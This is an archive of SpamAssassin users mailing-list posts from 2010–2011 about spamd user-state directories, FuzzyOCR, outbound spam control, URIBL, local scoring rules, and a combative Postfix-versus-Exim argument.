from:"Brian"

On 11-10-16 03:37 PM, RW wrote:
> 
> Could you not just run a script from cron that does chown ${USER}:spamd
> and chmod g+rw on all the files in the virtual home directories.

You seem to have gotten lost in minor details and lost sight on the
original problem which is that of being able to run spamd in such a way
that it setuids to the user receiving the mail (i.e. run as root, so
without -u) but also looks for the user_state dir (i.e. which is usually
~/.spamassassin) somewhere other than the user's $HOME
(--virtual-config_dir).  These two concepts, for some strange reason,
seem to be mutually exclusive.

If we can solve that, issues like permissions, etc. are easy to resolve.

Cheers,
b.

signature.asc
Description: OpenPGP digital signature

Re: --virtual-config-dir without -u

On 11-10-16 03:12 PM, RW wrote:
> 
> Not if you set --virtual-config-dir.

Right.  But such a change (i.e. a different $HOME on the server than on
any other machine) is still on the "transparent to users" change that I
am looking for -- the change that requires no user re-training and no
increase in help desk calls.

It really doesn't seem like it should be so difficult to point
spamassassin to a directory structure other than $HOME to find the
user_state directories.

I'm quite surprised that I am the first person who wants to be able to
do this.  Or rather achieve this kind of configuration.  If in fact
there is another way to achieve it than using the --virtual-config-dir
than I am open to suggestions.

To recap, I simply want to have the user_state (i.e. typically
~/.spamassassin) dirs somewhere other than $HOME on the server but have
those dirs and their files owned by their respective users and therefor
need to have spamd run as the recipient in order to be able to read (and
write in the case of the bayes and autowhitelist, etc. files) them while
allowing the users to read/write them also.  Is this in fact impossible
to do?

Cheers,
b.

signature.asc
Description: OpenPGP digital signature

Re: --virtual-config-dir without -u

On 11-10-16 02:08 PM, Martin Gregorie wrote:
> Yep. A brainfart on my part.

No worries.  :-)

> OK - if the MTA runs spamc (Postfix does this via a service defined as
> part of its configuration - others MTAs have a similar ability) the -u
> facility can be used to select the preference file much as it does now,

AFAICT the -u parameter just tells spamd what user to run as but spamd
will still look for .spamassassin in that (spamc -u specifed) users
$HOME.  So that doesn't really put my any further ahead than I am now.

Besides, some users want to have procmail rules before (and/or after)
spamc is run so pushing spamc into the MTA doesn't really work.

> but procmail isn't needed and you'd run a POP server (I like Dovecot 0-
> zero maintenance: it Just Works) that users use to collect their mail
> and their MUA can sort mail into spam folders, etc. on their local
> machines.

I like to give users MUA-independent methods of sorting (and otherwise
processing) mail, hence the need for .procmail.  That reduces the load
on per MUA mail handling support.

> That only leaves user preferences. Put them where spamd expects to find
> them, and add a symlink to the user's NFS mount point on the server.

Yeah.  I have been considering an approach like this where $HOME on the
server is a local dir with the .spamassassin dir in it and a symlink to
their automounted $HOME like:

$ ls -la $HOME
drwx--   4 brian brian4096 2011-10-16 08:52 .spamassassin
lrwxrwxrwx   1 brian brian      35 2011-10-16 09:17 real_HOME ->
/autohome/brian

and /autohome is an automount dir mounting the $HOME from the user's
machine to the server.

But then anyone logging into the server needs to know this and know that
their $HOME on the server is different than their local, native $HOME.
It seems like I really shouldn't need to go through these gyrations just
to be able to point spamassassin to a different directory tree for their
"state dir" (i.e. what is usually their ~/.spamassassin) dir.

> Of course, this assumes that all the procmail recipe does is to run
> spamc, but you haven't said it does anything else.

Indeed, it doesn't for some users which is why I need to keep procmail
in the loop.  But also, giving spamc to the MTA does not yet prove to
solve anything anyway.

Cheers,
b.

signature.asc
Description: OpenPGP digital signature

Re: --virtual-config-dir without -u

On 11-10-16 01:31 PM, Martin Gregorie wrote:
>
> Have you thought of running spamc remotely? This way you could avoid the
> need to login the the server just to process mail.

Hrm.  I'm not sure I follow.  The server receives the mail and the
server delivers it to the user's mailbox but on the way it passes
through spamd by way of a call to spamc -- all on the server.

> spamc takes -d -p and -u options, which should do exactly what you want:
>   -d gives the host name (default is localhost)
>   -p is the port (default 783)
>   -u is the username

Right.  But since I have spamc being called from procmail, they are all
running as the effective user anyway and thus the -u is moot (and
wouldn't work for any value other than the current user anyway).

> This way you can go on calling spamc from the procmail recipe so it
> would remain invisible to the users.

Sure, but the problem is in being able to provide spamd with a directory
outside of the users $HOME for his .spamassassin dir.

> You'd store user preferences on the server as individual files

Which is what I want to do, outside of their usual $HOME which actually
lives on their own machine and is NFS mounted on the server (currently).

> or in a
> MySQL database as others have described.

Yeah, just not interested in doing that much re-engineering when simply
being able to provide spamd with a different path for ~/.spamassassin
should suffice.

> The worst case would be that
> your users may have to log in to the server to change their preferences,

Well, they will get their ~/.spamassassin dir as an NFS mount from the
server, so same difference really.

> unless, that is, you go the MySQL way and provide, say, a simple PHP
> script to maintain them via an in-house Apache web server.

Yeah, not going there.  It's overkill and too much work to achieve what
I want.  I do appreciate the suggestions though.

b.

signature.asc
Description: OpenPGP digital signature

Re: --virtual-config-dir without -u

On 11-10-16 12:16 PM, Christian Grunfeld wrote:
> 
> You should have spamd running as root,

But I do that already.  That is what is causing the problem with the new
switch (--virtual-config-dir=...):

spamd: cannot use --virtual-config-dir without -u

> then it can setuid to the
> calling spamc uid which must be the user you want (%l).

Right.  All of that is in place currently with the existing
~/.spamassassin scheme.  That all works.

> So you must
> call spamc with the -u modifier instead of spamd !

I don't call spamd from the deliver end.  Each user has a .procmailrc
which pipes the mail through "spamc" so spamc is already being called by
the recipients effective user-ID.

> Another way is to have user_prefs and/or bayes in SQL.

Indeed, however that involves a user [re-]education.  I want to effect
the current user interaction (i.e. using ~/.spamassassin) transparently
to the users.

b.

signature.asc
Description: OpenPGP digital signature

--virtual-config-dir without -u

Hi,

In my network, users have their home dirs on their local machines (for
performance) which are automounted to the mail server for purposes of
spamd accessing their ~/.spamassassin dirs.

This of course fails when a machine is turned off so I want to move
users' ~/.spamassassin dirs to the server and create a symlink in each
users' ~ to link back to the server-hosted .spamassassin dir as such:
$ ls -l ~/.spamassassin
lrwxrwxrwx 1 brian brian 35 2011-10-16 09:17 /home/brian/.spamassassin
-> /net/mail/home/spamassassin/brian/

But to achieve this and make spamd use this /home/spamassassin/%l dir on
the machine "mail" it seems I need to add the "--virtual-config-dir"
option to spamd.  But that option requires I also use -u and then I
don't get spamd running as %l for access to the files in
/home/spamassassin/%l which are owned by %l.

Anyone got any ideas how I can achieve my goal here of simply relocating
~/.spamassassin dirs to the mail server and yet also having spamd run as
the user receiving the mail?

Much thanks in advance for any ideas.

Cheers,
b.



signature.asc
Description: OpenPGP digital signature

RE: FuzzyOCR

2011-07-06 Thread Brian Bebeau

> after an apt-get upgrade FuzzyOCR has stopped working. I get the
> following error in the log:
>
> FuzzyOCR: 2011-06-22 17:00:38 [3057] /usr/bin/jpegtopnm: Returned
> [2048], skipping...

I had this problem too, after upgrading SA to 3.3.x and FuzzyOCR to 3.6.0.
Upgrading netpbm fixed it for me.

> System is a Debian Squeeze Running Spamassassin 3.3.1 and FuzzyOCR
> 3.6.0
>
> Any idea?
>


This transmission may contain information that is privileged, confidential, 
and/or exempt from disclosure under applicable law. If you are not the intended 
recipient, you are hereby notified that any disclosure, copying, distribution, 
or use of the information contained herein (including any reliance thereon) is 
STRICTLY PROHIBITED. If you received this transmission in error, please 
immediately contact the sender and destroy the material in its entirety, 
whether in electronic or hard copy format.

RE: Writing an MTA

2010-07-27 Thread Brian Bebeau

Look in the source directory for spamc. Use the libspamc API. That’s what I do. 
It’s pretty simple.

From: Christopher Dobbs [mailto:crdo...@lybredyne.net]
Sent: Sunday, July 25, 2010 12:39 PM
To: users@spamassassin.apache.org
Subject: Writing an MTA

I am writing an MTA that uses mysql as a backend for storage.
I want to integrate spamassis into my mta.

Is there some C code that I can look at to understand howto do this.

Re: thanks to thinking people.

2010-07-23 Thread Brian Godette


 On 7/22/2010 2:23 PM, Ted Mittelstaedt wrote:



On 7/22/2010 11:29 AM, Benny Pedersen wrote:

On tor 22 jul 2010 20:03:18 CEST, Charles Gregory wrote

A forged sender looks no different than a legitimate sender. Postfix
would have no way to be 'smart' about this (except for some instances
of SPF fail, but then why 'bounce'? Why not reject?).


and why not show logs ?

bounces is newer external since postfix change sender to mailer-daemon
with will end in some mailbox local if it was sent from local ip, if it
sent remotely its just a reject that makes the remote mta do the bounce,
but it will be the same that happend remotely when it bounces

if bounces go external then the mta is not configured correct, and it
can be other reasons it does bounce then just not used a reject



Nonsense.

You have internal users.

They are using auth-smtp.

One of those "internal" users is running a laptop

He takes laptop to starflucks and joins the wireless

He sends mail through your server.

How exactly does Postfix "know" that he is an "internal"
user.

Spammer in the wild sees a mail from your user with a
senders address of "ilovec...@example.com" originating
from your smtp-auth system

Spammer in the wild guesses user is using a UID of
"ilovecats" and a password of "pussy"

Spammer in wild authenticates into your auth-smtp
server and spams the world with a forged senders
address.

How exactly does Postfix "know" the difference between
Spammer and the internal user on the laptop at Starflucks?

The notion of "bouncing mail to inside users" is a joke.

Ted



You don't BOUNCE you SMTP REJECT. No DSNs, no backscatter, and any FP 
from a legit user ends up with a support call to the correct party. If 
the outbound message does not exceed your SMTP REJECT level you let it 
go out WITHOUT MODIFICATION, no markup, no nothing.

Re: thanks to thinking people.

2010-07-23 Thread Brian Godette


 On 7/20/2010 1:01 PM, Ted Mittelstaedt wrote:


You are mistaken.  I'm a proponent of port 25 blocks.  What I
am saying is that port 25 blocks work far better than attempting to
spamfilter outbound mail.  It is the other guy who is arguing that
spamfiltering outbound mail is better than port 25 blocks.

Ted

 You need to actually read what I'm writing instead of skimming. The 
subjects being discussed are outbound mail from your own MTA, not 
joe-user's IP address, your own mail server's IP address. How internal 
and/or authenticated users with an infection can cause your MTA to end 
up on blacklists (especially trap fed) regardless of your rate based 
tripwires/log scanning. And how dumb-bots nearly never send outbound (to 
the rest of the world) through your MTA, only the smarter ones that can 
use SMTP-AUTH usually do that. That all leads to needing something a bit 
more than log scanning and rate limiting.


Again, blocking outbound 25 from everything but your own MTA is all well 
and good for containing internal outbreaks from causing everyone else 
grief, but it has little impact on keeping your own MTA clean.

Re: thanks to thinking people.


 On 7/19/2010 4:01 PM, RW wrote:

On Mon, 19 Jul 2010 13:25:26 -0700
Ted Mittelstaedt  wrote:



It's been our experience that spam-scanning outbound mail causes a lot
more problems than setting up mailserver monitoring and being
responsive to it.  Sooner or later one of your customers is going to
call you and bitch because their mail ended up in their
coorespondents spam folder due to them using HTML or including a bad
URL and if it was your server that tagged it spam,

What's the point of adding spam-filtering headers or markup to outgoing
mail?

Indeed, the point would be to score and SMTP reject outbound over some score, 
anything under would be sent unmodified. If it's a FP your own user contacts 
you.

Re: thanks to thinking people.


 On 7/19/2010 2:25 PM, Ted Mittelstaedt wrote:



On 7/19/2010 12:56 PM, Brian Godette wrote:

On 7/19/2010 1:29 PM, Ted Mittelstaedt wrote:



On 7/19/2010 8:43 AM, Brian Godette wrote:

On 7/15/2010 6:55 PM, Alexandre Chapellon wrote:

Hi all,

Few months ago I asked this list if using SA on outgoing smtp was a
good idea (Thread: SA on outgoing SMTP).
This thread quickly moved to "Block direct port 25 for non-mta users!
I was really afraid of doing so and didn't really wanted to go this
way.
now about 6 months later I have to say: I was a fool! Today.
After spending some time trying to find a more user-friendly way to
clean up the mess around here, I came to the conclusion that port 25
blocking on the bound of my network was inevitable.
Today it's done, and I have followed few others advices given on 
list.

I wanted to testify the benfits of good designed network for thoose
who like me are afrais of annying customer with security (even more
blocking port 25 on the limits of the network is not really annoying
for most of customers).

Thanks to Ted Mittelstaedt, Matus UHLAR, Martin Gregorie, with your
help dudes, all I have to care about now is my mailservers
configuration!

--
Alexandre Chapellon mailto:alexandre.chapel...@mana.pf>>
Mana SAS



I hope you realize you still need to deal with the issues of users 
with

weak/guessable passwords and phishing of account info as well as the
newer bots that recover account info from Outlook/Outlook
Express/Thunderbird.

Blocking outbound 25 from the rest of your network, and disallowing
submission to your MX on 25 from your network, does very little for
keeping your own MX from sending spam which is what SA on outgoing 
SMTP

would be for. It's great from a policy standpoint and contains the
"simple" bots, but for keeping your outbound from MX clean, not so 
much.




That absolutely isn't true. Yes I agree that it's possible for a
spammer to write a virus that uses the submission port and
authenticated SMTP to send mail and runs on a user's PC. But if your
running even a simple log analysis script on your mailserver and you
READ the daily reports from it, then a user that sends many tens to
hundreds of thousands of e-mails will stick out like a sore thumb.

We have NEVER had a spammer do this to one of our users. I don't know
why because it seems to me like it's an obvious way to relay spam. What
we HAVE had happen is spammers guess weak passwords and relay spam
through the webmail interface. My guess is that it's just a lot
easier to do this for them. Of course, when they do that their outgoing
spam is stamped with the username that was used to relay, and it's
very easy to detect and change the password.

So far, all the spam viruses we have encountered on user systems are
of the variety where they infect the client and attempt to relay to
port 25.

Ted


So basically you're agreeing with what I said. It stops the simple bots,
but the other stuff, not so much.



No, you said it "does very little" and I said it only "does very little"
in THEORY, but in actual practice (right now) it does a tremendous 
amount.


In actual practice it does very little for YOUR OWN MX, the simple bots 
simply do not target internal mail servers, they send direct. Which is 
why I said it's good from a policy standpoint but does nothing to 
actually prevent YOUR OWN MX from ending up on an RBL because all the 
bots that can do that don't care that you've got outbound 25 from your 
internal network blocked.




I won't rule out that the spammers won't become smarter but right now
they are stupid.  I guess there's just too many wide-open servers still
out there for them to bother trying to get around one that's been 
tightened down.



I've seen bots use smtp-auth from inside, whether it's by injecting into
O/OE or recovered auth I can't say. I've seen bots use webmail as you
have, I've also seen them use smtp-auth vs submission/ssl (587/495). But
again, that's only after they've either guessed or phished the account
info. In either case you're still left with having to scan outbound from
your own MX, and/or rate limit, or accept being RBL'd for short periods
of time being reactive to log analysis and spam reports.


If you keep on top of the logs then you won't generally be RBLed.  And 
you can run a monitoring program like Big Sister and with a bit of 
scripting you can be notifed when your server starts spamming. 
Out-of-the-box the SMTP monitor in Big Sister will alarm if the 
mailserver starts slowing down - which is customary when a spammer 
commences a large spam run.  But you can also write a script that runs 
once an hour

and monitors your mailflow and alarms if it jumps.  If your graphing
your mailflow then spam runs will create spikes that are very obvious.


At which point it's alread

Re: thanks to thinking people.


 On 7/19/2010 1:29 PM, Ted Mittelstaedt wrote:



On 7/19/2010 8:43 AM, Brian Godette wrote:

On 7/15/2010 6:55 PM, Alexandre Chapellon wrote:

Hi all,

Few months ago I asked this list if using SA on outgoing smtp was a
good idea (Thread: SA on outgoing SMTP).
This thread quickly moved to "Block direct port 25 for non-mta users!
I was really afraid of doing so and didn't really wanted to go this 
way.

now about 6 months later I have to say: I was a fool! Today.
After spending some time trying to find a more user-friendly way to
clean up the mess around here, I came to the conclusion that port 25
blocking on the bound of my network was inevitable.
Today it's done, and I have followed few others advices given on list.
I wanted to testify the benfits of good designed network for thoose
who like me are afrais of annying customer with security (even more
blocking port 25 on the limits of the network is not really annoying
for most of customers).

Thanks to Ted Mittelstaedt, Matus UHLAR, Martin Gregorie, with your
help dudes, all I have to care about now is my mailservers 
configuration!


--
Alexandre Chapellon mailto:alexandre.chapel...@mana.pf>>
Mana SAS



I hope you realize you still need to deal with the issues of users with
weak/guessable passwords and phishing of account info as well as the
newer bots that recover account info from Outlook/Outlook
Express/Thunderbird.

Blocking outbound 25 from the rest of your network, and disallowing
submission to your MX on 25 from your network, does very little for
keeping your own MX from sending spam which is what SA on outgoing SMTP
would be for. It's great from a policy standpoint and contains the
"simple" bots, but for keeping your outbound from MX clean, not so much.



That absolutely isn't true.  Yes I agree that it's possible for a 
spammer to write a virus that uses the submission port and 
authenticated SMTP to send mail and runs on a user's PC.  But if your 
running even a simple log analysis script on your mailserver and you 
READ the daily reports from it, then a user that sends many tens to 
hundreds of thousands of e-mails will stick out like a sore thumb.


We have NEVER had a spammer do this to one of our users.  I don't know
why because it seems to me like it's an obvious way to relay spam.  What
we HAVE had happen is spammers guess weak passwords and relay spam 
through the webmail interface.  My guess is that it's just a lot

easier to do this for them.  Of course, when they do that their outgoing
spam is stamped with the username that was used to relay, and it's 
very easy to detect and change the password.


So far, all the spam viruses we have encountered on user systems are
of the variety where they infect the client and attempt to relay to
port 25.

Ted

So basically you're agreeing with what I said. It stops the simple bots, 
but the other stuff, not so much.


I've seen bots use smtp-auth from inside, whether it's by injecting into 
O/OE or recovered auth I can't say. I've seen bots use webmail as you 
have, I've also seen them use smtp-auth vs submission/ssl (587/495). But 
again, that's only after they've either guessed or phished the account 
info. In either case you're still left with having to scan outbound from 
your own MX, and/or rate limit, or accept being RBL'd for short periods 
of time being reactive to log analysis and spam reports.

Indirectly related to SA.

 Like some people I run a small internal spamtrap of never used by real 
users addresses for use in feeding Bayes as well as reporting to Razor 
and internal IXHASH. In addition I also have a database that returns 
"550 User unknown" for all email addresses that are "dead", with the 
date they were deactivated.


My question is, at what point would one consider such an address old 
enough for inclusion into a reviewed trap for further training and 
reporting, and at what point, if it were left returning "550 User 
unknown", where it could bypass review?

Re: thanks to thinking people.


 On 7/15/2010 6:55 PM, Alexandre Chapellon wrote:

Hi all,

Few months ago I asked this list if using SA on outgoing smtp was a 
good idea (Thread: SA on outgoing SMTP).

This thread quickly  moved to "Block direct port 25 for non-mta users!
I was really afraid  of doing so and didn't really wanted to go this way.
now about 6 months later I have to say: I was a fool! Today.
After spending some time trying to find a more user-friendly way to 
clean up the mess around here, I came to the conclusion that port 25 
blocking on the bound of my network was inevitable.
Today it's done, and I have followed few others advices given on list. 
I wanted to testify the benfits of good designed network for thoose 
who like me are afrais of annying customer with security (even more 
blocking port 25 on the limits of the network is not really annoying 
for most of customers).


Thanks to  Ted Mittelstaedt, Matus UHLAR, Martin Gregorie, with your 
help dudes, all I have to care about now is my mailservers configuration!


--
Alexandre Chapellon >

Mana SAS



I hope you realize you still need to deal with the issues of users with 
weak/guessable passwords and phishing of account info as well as the 
newer bots that recover account info from Outlook/Outlook 
Express/Thunderbird.


Blocking outbound 25 from the rest of your network, and disallowing 
submission to your MX on 25 from your network, does very little for 
keeping your own MX from sending spam which is what SA on outgoing SMTP 
would be for. It's great from a policy standpoint and contains the 
"simple" bots, but for keeping your outbound from MX clean, not so much.

Re: URIBL Notice

2010-03-12 Thread Brian

On Fri, 2010-03-12 at 07:48 -0800, Ray Dzek wrote:
> I just received the dreaded URIBL “You send us to many DNS queries”
> notice.  This is fine.  We have been growing and I am sure our queries
> have gone up.  But when looking at their data feed service options the
> first thing I noticed was that there is no fee structure.  I don’t
> know about you, but that is always a red flag in my world.  Before I
> even get past the first paragraph it already smells like a
> “shakedown”.
> 
>  
> 
> But…
> 
>  
> 
> My real question is how badly is my SA environment going to be
> impacted by turning URIBL off?  What increase in spam should I expect?
> 
>  
> 
> Ray
> 
> 
You'll see some difference but from experience it lets through more than
it blocks and is a bit of a 'shutting the stable door after the horse
has bolted' kind of list.

There is nothing to stop you setting up a simple BIND server and
creating your own local uri based block list customised to your own
needs and based on the links you most frequently see. I've done it and
I'm sure plenty of others have too.

Re: Bogus mails from hijacked accounts

2010-03-11 Thread Brian

On Thu, 2010-03-11 at 07:55 -0600, Dennis B. Hopp wrote:
> > 1)  Spammers rotate sender addresses and hijacked account info more 
> > often than most of us change our underwear.  An account *may* get 
> > reused;  chances are it'll be months before it does, and the spammers 
> > will have rotated through hundreds or thousands of others - both 
> > phish-cracked and those set up just to send their junk.  Blacklisting a 
> > sender is reduced to blocking the persistent friend-of-a-friend who 
> > refuses to remove you from the endless stream of chain-forwards, and 
> > legitimate-but-totally-clueless mailing list operators who can't figure 
> > out how to unsubscribe you from their list.  :(
> > 
> > 2)  You noted originally that these appear to be fully legitimate 
> > freemail accounts, legitimately used in the past to correspond with your 
> > customers/clients, that have been compromised and then used to send 
> > spam.  How do you propose to still allow the legitimate account holders 
> > to email your clients if you blacklist the sender?
> > 
> 
> I don't want to blacklist the address, hence the reason why in my
> original e-mail I said "other then blacklisting".  I know blacklisting
> would block these bogus e-mails as well as legit e-mails as soon as the
> clients get access back (they currently don't have access to their
> accounts because their passwords have been changed).  
> 
> 
> > 
> > Martin's suggestion followup should point you in the right direction. 
> > Sets of phrase rules (how similar are these messages?  do you have ten 
> > or fifteen you can compare sentence-by-sentence?) with low scores will 
> > likely help some too.  Meta rules that bump the score up depending on 
> > how many phrases hit, or phrase+mismatched-sender/reply also work 
> > tolerably well on this class of spam... if you can get enough samples to 
> > build a complete enough set of phrase rules.
> 
> I'm going to look at what Martin suggested and compare it to what
> samples I have.
> 
> Thanks,
> 
> --Dennis
> 
Don't miss the major key in the body - that is 'Western Union'. I don't
know how much legitimate business you do with WU (or Moneygram for that
matter) but it may well be worthy of a half decent score.

>

Re: Bogus mails from hijacked accounts

2010-03-11 Thread Brian

On Thu, 2010-03-11 at 12:26 +, Ned Slider wrote:
> David B Funk wrote:
> > On Wed, 10 Mar 2010, Dennis B. Hopp wrote:
> >>
> >> I have put a sample at:
> >>
> >> http://pastebin.com/9BDXrxmm
> >>
> >> Note I did change the real e-mail address in this message but the
> >> hotmail address used is valid just masked.
> > 
> > Look at that "X-Originating-IP: [41.155.87.236]" header, its a dial-up
> > pool in Lagos Nigeria.
> > 
> > It may seem stereotyped, but it's amazing the percentage of this kind
> > of spam that -does- come out of that part of the world.
> > 
> 
> How about:
> 
> # Catch spam originating from 41.0.0.0/8 (Africa, incl S.Africa)
> describe  LOCAL_ORIG_FROM_41  Originates from 41.0.0.0/8
> headerLOCAL_ORIG_FROM_41  X-Originating-IP =~ /\[41\./
> 
> Unless you're expecting mail originating from Africa, you can go further 
>   and detect all mail injected from 41/8 with few FPs.
> 
> # Catch spam injected from 41.0.0.0/8 (Africa, incl S.Africa)
> describe  LOCAL_RCVD_FROM_41  Received from 41.0.0.0/8
> headerLOCAL_RCVD_FROM_41  Received =~ /\[41\./
> 
> I've found these safe to score quite highly, but YMMV so score as suits 
> your mail flow.
> 
> 
Good quality advice from Ned (LOL). Just make sure none of your users
will be communicating with South Africa during the world cup..

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 15:22 -0800, Bob O'Brien wrote:
> Noel Butler wrote:
> > He has a point though, and why is it when people don't agree with 
> > someone the troll label comes out, FFS get over your selves.  People 
> > always only half read, and then go half cocked, its called life, get 
> > used to it.
> 
> 
> 
> In this case the "troll" label is more of an understatement,
> as there are some pretty clear indications that was the second
> (at least) psuedo-identity adopted by a person who had already
> been formally warned and then ejected from SA-USERS for
> inappropriate behavior.
> 
> 
Said the liar from Barracuda - aka 'emailreg.org'. I may be hated in the
Postfix/Spamassassin groups Bob - but you and Barracuda are hated the
world over. I can't top that!

Still, nice to watch you all whine about this and drag the topic on and
on and on..

Re: End of Thread [Was: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt]

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 12:16 +, Ned Slider wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 12:35 +0100, Kai Schaetzl wrote:
> >> Brian wrote on Tue, 09 Mar 2010 06:51:45 +:
> >>
> >>> Yes, but that does not answer my question {and is once more Postfix
> >>> biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
> >>> Spamassassin decides IS SPAM without the aid of a milter or policy
> >>> deamon of some kind.
> >> You have a very simplistic view on how mail transportation works and maybe 
> >> on how software works. 
> >> First: Postfix is a M Transport A and not a M Rejection A. It's common 
> >> practice in software design to have "plugins" do work that the core 
> >> package doesn't. 
> > 
> > YAWN - it's not about how software is constructed or what it does, but
> > more about what Postfix is incapable of doing and the old stock trollop
> > that is rolled out 'That's not the job of the MTA'. That answer was just
> > about good enough in the 1990's, but it's lame now.
> > 
> 
> It's clear you either haven't read or haven't understood what Kai wrote, 
> which btw was spot on.
> 
> End of Thread.

It's clear that you arn't able to answer the question. Fact, Postfix
lacks features.

End of thread

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 12:35 +0100, Kai Schaetzl wrote:
> Brian wrote on Tue, 09 Mar 2010 06:51:45 +:
> 
> > Yes, but that does not answer my question {and is once more Postfix
> > biased} AFAIK Postfix is totally unable to reject mail at SMTP time that
> > Spamassassin decides IS SPAM without the aid of a milter or policy
> > deamon of some kind.
> 
> You have a very simplistic view on how mail transportation works and maybe 
> on how software works. 
> First: Postfix is a M Transport A and not a M Rejection A. It's common 
> practice in software design to have "plugins" do work that the core 
> package doesn't. 

YAWN - it's not about how software is constructed or what it does, but
more about what Postfix is incapable of doing and the old stock trollop
that is rolled out 'That's not the job of the MTA'. That answer was just
about good enough in the 1990's, but it's lame now.

In the year 2010 it is not unreasonable to expect the MTA that takes
responsibility for accepting a message to make reasonable checks about
the validity or content of that message. This is very much a 1980's
programming view of telling the user what they can have, rather than
implementing the basic features the user requires.

It's interesting to note that Barracuda Networks had to write their own
MTA* to put in front of Postfix to support all the features it could not
offer.

Exim seems to offer far more than Postfix will ever bleat about
supporting but perhaps the University of Cambridge have a 'simplistic
view on how mail transportation ... and software works' 

This is all very OT and pointless. Anyone who has dealt with Postfix in
terms of years knows all the flaws, such as rejecting message with
Spamassassin at SMTP needs a milter/PD - and that this milter has (on
top of a few minor bugs) now been found to have a serious vulnerability.

*I use the term 'write their own mta' in the loosest sense of the word
as I have been unable to source the origin of the BSMTP that they use.

Please feel free to carry on flogging a dead horse ;-)

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 14:45 +0100, Ralf Hildebrandt wrote:
> * Brian :
> 
> > So Ralf - author of 'The Postfix Book', can you please now tell me how
> > to get Postfix to reject mail before it accepts it and gives a 250 -
> > When Spamassassin tags it as spam? 
> 
> Well, I'm using amavisd-new for that, since I'm also scanning the
> mails for viruses:
> 
> smtpd pass  -   -   -   -   -   smtpd
>-o receive_override_options=no_address_mappings
>-o smtpd_proxy_filter=[127.0.0.1]:10025
>-o smtpd_proxy_options=speed_adjust
> 
> and in amavisd-new I'm using:
> 
> $final_spam_destiny   = D_REJECT;
> 
And the bit where I said 'not using amavis / policy deamon / milter'
escaped you where? For someone that wrote a book you don't seem to read
well ;-)

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 13:38 +, Ned Slider wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 14:04 +0100, Yet Another Ninja wrote:
> >> to stay on the Postfix 'merry-go-round' for an answer, or we
> >>> can just agree Postfix can't easily do this and move on and stop
> >>> flogging this dead horse :-)
> >> good idea -
> >>
> >> Here, its totally off topic.
> >>
> >> Move it to Postfix lists
> >>
> > Better idea, just drop it! Postfix lacks features and it's a fair
> > statement.
> > 
> 
> It's fair to say Postfix "lacks features" only you seem to want because 
> everyone else understands how to reject mail in Postfix.
They do? Again - without using a milter or Policy Deamon remind me how
postfix can reject mail c/o spamassassin before it accepts it? Be my
guest. As you've already told me 'everyone else understands how to
reject mail in Postfix' perhaps you Ned would just answer that for me?
It's OK to say 'it can't' and that it lacks this feature.
> 
> > There are enough arse lickers here without going to the Temple of Weiste
> > to visit the disciples without the socks.
> > 
> > Perhaps if people stopped kissing arse and grovelling so much Postfix
> > would have some sensible features - but that ain't gonna happen any time
> > soon.
> > 
> 
> [Rhetorical] - why do you feel the need to bring that sort of offensive 
> tone to a public mailing list?
> 
And you think you have the right to declare other peoples threads as
dead? WTF do you think *you* are just because you don't like what is
written?

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 13:24 +, Robert Brooks wrote:
> Brian wrote:
> > On Tue, 2010-03-09 at 13:00 +, Robert Brooks wrote:
> >> Brian wrote:
> >>> On Tue, 2010-03-09 at 13:17 +0100, Ralf Hildebrandt wrote:
> >>>> * Brian :
> >>>>
> >>>>> In the year 2010 it is not unreasonable to expect the MTA that takes
> >>>>> responsibility for accepting a message to make reasonable checks about
> >>>>> the validity or content of that message. 
> >>>> Postfix can do this either via the milter interface OR the
> >>>> smtpd_proxy_filter
> >>>>
> >>>> It's very easy.
> >>>>
> >>> So Ralf - author of 'The Postfix Book', can you please now tell me how
> >>> to get Postfix to reject mail before it accepts it and gives a 250 -
> >>> When Spamassassin tags it as spam? 
> >> personally I use smtpd_proxy_filter to do EXACTLY this.
> > 
> > And without an external program.. ?
> > 
> > Clue 'YOU CAN'T'.
> 
> so your objection is that there's an "external program" between Postfix 
> and Spamassasin?
> 
> Personally I find amavisd-new does a fine job. That Postfix doesn't 
> directly present an email directly to spamassassin is fine with me, 
> since I wish to do a bunch of other checks (AV for instance).

Do I object to there being a program to interface Postfix to
Spamassassin - not necessarily. It would be nicer to not have to do it
this way and the clue as to why is in the title of the thread.

Postfix remains an MTA for the 1990's as it is, but that's just a view.
If 9x% of the traffic an MTA gets to see is unwanted SPAM, it's not
unreasonable to expect a solid and reliable built in mechanism to reject
it. It's a Postfix ethos to not accept mail for 'x' reason but the old
'it's only an MTA' arguement comes out time and time again by a small
group of people who are so far up the arse of WT, you would think they
were his piles!

Put it this way. I were buying a cheap car 20 years ago I would have
expected to add my own alarm and immobiliser to deal with threats and
vulnerabilities - after all a car is just a car, not a security system.
In 2010 even a cheap car has a built in immobiliser as it has adapted to
the threat and expectations of customers.

I'm glad you like amavis-new. I found it to scale poorly and a single,
common point of failure and fall into the category that is commonly
called 'bloat'. It does illustrate all the missing features of Postfix
in quite a handy example - so thanks for mentioning it.

This thread has run on past it's bedtime and has already degenerated
beyond useful to Spamassassin users. I'm sure the asshats and asslickers
will continue to populate it and argue the toss, but the facts are
stark. Postfix lacks basic features for the age. Put it side by side
with Exim and the 'it's only an MTA' thing falls flat on it's face.

Good luck squabbling about it girls LOL.

Re: [Emerging-Sigs] SIG: SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

2010-03-09 Thread Brian

On Tue, 2010-03-09 at 13:17 +0100, Ralf Hildebrandt wrote:
> * Brian :
> 
> > In the year 2010 it is not unreasonable to expect the MTA that takes
> > responsibility for accepting a message to make reasonable checks about
> > the validity or content of that message. 
> 
